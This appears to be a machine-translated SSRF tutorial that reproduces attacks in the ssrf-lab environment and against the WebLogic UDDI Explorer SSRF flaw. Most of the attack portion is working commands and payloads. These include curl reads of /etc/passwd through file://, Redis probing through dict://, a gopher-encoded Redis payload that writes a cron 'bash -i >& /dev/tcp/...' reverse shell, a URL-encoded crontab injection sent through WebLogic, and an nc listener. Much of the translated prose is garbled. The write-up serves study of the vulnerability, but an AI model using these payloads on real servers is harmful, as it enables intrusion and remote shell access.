Preface:
This article first appeared to the Prophet communities combine vulnerability, ssrf-lab study SSRF Vulnerability
Learn new knowledge, this time by the presence of Weblogic SSRF vulnerabilities and ssrf-lab, to study the vulnerability SSRF
0x00 understand SSRF
SSRF profile:
SSRF(Server-Side Request Forgery)
That server-side request forgery, counterfeiting exploit server-initiated requests, thus breaking the client can not obtain data limitations, essentially belongs to the information disclosure vulnerability.
SSRF Vulnerability principle:
SSRF
The causes are mostly due to the server provides the ability to get data from other servers and applications do not have filters and restrictions on the destination address. Such as access from the specified URL address of the web page text, Load picture specified address, download, etc., but also in most of the web server architecture , web server itself can access the Internet and intranet server resides , so an attacker can pass the address to make any back-end server to its initiates a request, and returns the data to the target address of the request
and, in general, the SSRF
goal of the attack is an internal system can not be accessed outside the network (ie network), so SSRF loopholes It can be summed up in one sentence: the use of a network can initiate a request for service as a springboard to attack other internal services
gopher, dict protocol and redis service, Curl command
Gopher
Agreement can do many things, in particular, can play an important role in many of the SSRF. Using this protocol can attack within the network FTP、Telnet、Redis、Memcache
, it can also be GET、POST
requested.
DICT
Agreement, a dictionary server protocol A Dictionary Server Protocol
that allows clients to access more dictionaries in the course of the agreement and server listening port number: 2628
.
redis
Service is in 6379
port open
these we generally look to know its usefulness
curl command has a very important role in the SSRF vulnerabilities, so here is a brief introduction to curl command:
curl is commonly used command-line tool, used to request the Web server. Its name is the client (client) tool means of URL
When no parameters, curl is to issue a GET request
$ curl https://www.example.com
The above command to www.example.com
issue a GET request, the content server will be returned in the command line output
-v
Output of the entire communication process parameters for debugging. We can use -v
the parameters to read the file
使用file协议curl -v file:///etc/passwd
使用ftp协议 curl -v "ftp://127.0.0.1:端口/info"
使用dict协议 curl -v "dict://127.0.0.1:端口/info"
使用gopher协议 curl -v "gopher://127.0.0.1:端口/_info"
Other parameters can refer to curl
Common IP network segment
LAN address range into three categories, the following IP segment IP network segment:
C类:192.168.0.0 - 192.168.255.255
B类:172.16.0.0 - 172.31.255.255
A类:10.0.0.0 - 10.255.255.255
Mining and use SSRF vulnerabilities:
The presence of SSRF
vulnerable sites using four main agreement, namely http、file、gopher、dict
the agreement
file
Agreements read local files
http
protocol ip scanning within the network, port probes
to detect 6379
port is open, you can use http、gopher、dict
these protocols to play an open 6379
port redis
services.
As the figure, there is shown in many ways SSRF mining and use only by theory can not understand something, and then practice the following:
0x01 ssrf-lab
OUTGOING WEBHOOK input https://yourhandler.io/events
is required to monitor REST API test items
in results SEE THE RESULT displayed portion in response to the request and status codes
Following the first test 127.0.0.1
, we found echo data, indicating that there is no limit internal network ip
above understanding of the SSRF can read files through several protocols, test it in here:
Use file:///etc/passwd
read user passwords, can be found reading
In addition, the use of this protocol can read any file within the host. Then you can easily read the configuration file and the source code for further penetration, here's success is achieved because there is no rigorous URL filtering, so it can use this protocol to read arbitrary files.
In the above also introduced redis
the service, read a lot of SSRF
protocol in use Redis services are combined, so here in the first ssrf-basics
installation of the service inside the container
$ docker ps #查看容器编号
$ docker exec -it 容器编号 /bin/bash #进入容器
$ apt-get install redis-server # 安装redis服务
$ redis-server #开启redis服务
After installing, you can use the protocol to gather information and rebound shell
Use dict
agreement, dict://127.0.0.1:6379/info
can get local redis
service configuration information
using the dict://127.0.0.1:6379/KEYS *
acquired redis
content storage
that is dict
simple using the protocol, in addition, the use of gopher
protocol can attackredis
Redis exist within the network of unauthorized access vulnerabilities, when Redis service runs with root privileges, use Gopher protocol attacks within the network of Redis, a rebound can be achieved by writing shell regular tasks
First of all first look at Redis command normally attack and then converted into Gopher protocol available
redis-cli -h $1 flushall
echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1\n\n"|redis-cli -h $1 -x set 1
redis-cli -h $1 config set dir /var/spool/cron/
redis-cli -h $1 config set dbfilename root
redis-cli -h $1 save
//redis-cli查看所有的keys及清空所有的数据
This is common exp, simply change their own IP and port can be, adapted to the changed Gopher
URL protocol:
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/www/html/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
After decoding url is:
gopher://127.0.0.1:6379/_*1 $8 flushall *3 $3 set $1 1 $64 */1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1 *4 $6 config $3 set $3 dir $16 /var/www/html/ *4 $6 config $3 set $10 dbfilename $4 root *1 $4 save quit
Tested and found echo
Then in ssrf-lab/basics
view inserted inside the container KEY value, verify that the successful
use of Gopher
the protocol can also attack FastCGI
, attack within the networkVulnerability Web
Specifically refer to the use of the Gopher protocol expanding the attack surface
0x02: Weblogic SSRF Vulnerability
There is Weblogic in a SSRF vulnerability exploit the vulnerability can send arbitrary HTTP request, and then in the attack network redis, fastcgi and other vulnerable components of
the vulnerability is located in http://192.168.186.130:7001/uddiexplorer//uddiexplorer/SearchPublicRegistries.jsp
, Google translate
search private registry, and then there above a public registry, you can choose Microsoft , IBM, which is specified URL address acquisition webpage text content
just to fill out the content, it found that the request is gET requests and POST requests can be constructed directly next parameter, the specified URL changed a bit and see how the results appear, We must first find out the parameters corresponding to each
constructed parameters:
?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
Initiating a request, found
accessible port error will be generally returned status code
, if a port is not present, it returns could not connect over HTTP to server
this way it can detect the network state
In addition,
Weblogic
inSSRF
a relatively large features, although it is a "GET" request, but can be passed%0a%0d
to inject newline, redis service each command is separated by line breaks, it can be attacked by the SSRF redis server in the network
Since there can be SSRF attack, then by injecting HTTP header, use Redis to rebound shell
First detection by SSRF network of redis
servers, tested and found to 172.18.0.2:6379
be in communication (as used here docker and to build the docker
network environment is generally 172. *, but here it is my request always times out first with the next master pictures)
thus, knowing the docker address environment 172.18.0.2
, the port 6379
is running Redis service
Then send three redis
commands, the bomb shell script is written /etc/crontab
:
test
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.186.130/4444 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
aaa
GET pass in use, URL encoding
%74%65%73%74%73%65%74%20%31%20%22%5c%6e%5c%6e%5c%6e%5c%6e%2a%20%2a%20%2a%20%2a%20%2a%20%72%6f%6f%74%20%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%38%36%2e%31%33%30%2f%34%34%34%34%20%30%3e%26%31%5c%6e%5c%6e%5c%6e%5c%6e%22%63%6f%6e%66%69%67%20%73%65%74%20%64%69%72%20%2f%65%74%63%2f%63%6f%6e%66%69%67%20%73%65%74%20%64%62%66%69%6c%65%6e%61%6d%65%20%63%72%6f%6e%74%61%62%73%61%76%65%61%61%61
Before initiating a request to monitor 4444
port
nc -lvp 4444
After the request for a period of time, you can successfully rally the shell
Here the process of reproduction appears a little problem, access http://172.18.0.2:6379/
times out, but the purpose of reproduction of this vulnerability but also to learn how to SSRF, a word learned in this position, are also considered not white reproduction.